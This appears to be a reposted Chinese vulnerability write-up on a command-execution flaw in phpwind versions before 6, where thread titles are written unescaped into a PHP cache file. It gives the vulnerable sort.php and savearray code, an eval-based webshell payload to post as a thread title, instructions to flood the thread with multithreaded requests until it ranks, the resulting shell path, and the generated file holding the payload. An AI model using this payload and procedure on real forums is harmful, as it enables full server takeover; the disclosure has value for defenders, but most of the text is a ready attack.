zoukankan      html  css  js  c++  java

  • phpwind < v6 版本命令执行漏洞

    phpwind/sort.php 会定期每天处理一次帖子的浏览量、回复量、精华版排序

    代码直接使用savearray将数据库查询出来的内容写入php文件,savearray出来的参数,都使用"双引号来包含,所以可以利用变量来执行任意命令

    elseif($action=='article'){

	$cachetime=@filemtime(D_P."data/bbscache/article_sort.php");

	if(!$per || $timestamp-$cachetime>$per*3600){

		$_SORTDB=$_sort=array();

		$query=$db->query("SELECT t.tid,t.subject,t.replies,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.replies DESC LIMIT $cachenum");

		while($topic=$db->fetch_array($query)){

			if($topic['replies']){

				$topic['subject']=substrs($topic['subject'],25);

				$_sort[]=$topic;

			}

		}

		$_SORTDB['reply']=$_sort;



		$_sort=array();

		$query=$db->query("SELECT t.tid,t.subject,t.hits,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.hits DESC LIMIT $cachenum");

		while($topic=$db->fetch_array($query)){

			if($topic['hits']){

				$topic['subject']=substrs($topic['subject'],25);

				$_sort[]=$topic;

			}

		}

		$_SORTDB['hit']=$_sort;

		$_sort=array();

		$query=$db->query("SELECT t.tid,t.subject,t.digest,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.digest<>'0' AND t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden'  ORDER BY t.lastpost DESC LIMIT $cachenum");

		while($topic=$db->fetch_array($query)){

			$topic['subject']=substrs($topic['subject'],25);

			$_sort[]=$topic;

		}

		$_SORTDB['digest']=$_sort;

		$ARTICLEDB=savearray('_ARTICLEDB',$_SORTDB);



		writeover(D_P.'data/bbscache/article_sort.php',"<?php
".$ARTICLEDB.'?>');

	}

      

    发表一个帖子:标题如下

    code 区域 
    ${@eval($_POST[x])}XXXX

    article_title.jpg





    再开一个多线程(100线程,几分钟就可以了),请求访问那个帖子,直到帖子的访问量排入前20

    function savearray($name,$array){

	$arraydb="$$name=array(
		";

	foreach($array as $key=>$value){

		$arraydb.="'".$key."'=>
array(
			";

		foreach($value as $value1){

			$arraydb.='array(';

			foreach($value1 as $value2){

				$arraydb.='"'.addslashes($value2).'",';

			}

			$arraydb.="),
			";

		}

		$arraydb.="),
		";

	}

	$arraydb.=");
";

	return $arraydb;

      

    二天,生成统计排行的时候,shell就躺在了 /data/bbscache/article_sort.php

    三个白帽实际演示:http://**.**.**.**/data/bbscache/article_sort.php

    article_shell.jpg

     

    漏洞证明:

    /data/bbscache/article_sort.php

    <?php

$_ARTICLEDB=array(

		'reply'=>

array(

			array("1","${@eval($_POST[x])}XXXX ..","5732","2",),

			array("10","DDDDDDDDDDDDDDDDD","20","2",),

			array("7","HI Everybody (  b)ம","8","2",),

			array("3","hello","5","2",),

			array("5","䜲⊔","3","2",),

			array("2","test","3","2",),

			array("9","AAAAAAAAAAAAA","2","2",),

			array("6","ִА⫢,"1","2",),

			array("8","�⵽բ萾ዢ,"1","2",),

			),

		'hit'=>

array(

			array("1","${@eval($_POST[x])}XXXX ..","11382","2",),

			array("2","test","3235","2",),

			array("3","hello","985","2",),

			array("5","䜲⊔","331","2",),

			array("7","HI Everybody (  b)ம","123","2",),

      
  • 相关阅读:
    九章强化最后一章
    强化第一章
    双指针
    数据结构强化1
    动态规划强化
    动态规划
    selenium上传文件,怎么操作
    在python 3.6的eclipse中,导入from lxml import etree老是提示,Unresolved import:etree的错误
    在python 3.6下用pip 安装第三方库,比如pip install requests,老是报错 Fatal error in launcher: Unable to create process using '"'
    python3 + selenium + eclipse 中报错:'chromedriver' executable needs to be in PATH. Please see https://sites.google.com/a/chromium.org/chromedriver/home
  • 原文地址:https://www.cnblogs.com/hookjoy/p/5426063.html
Copyright © 2011-2022 走看看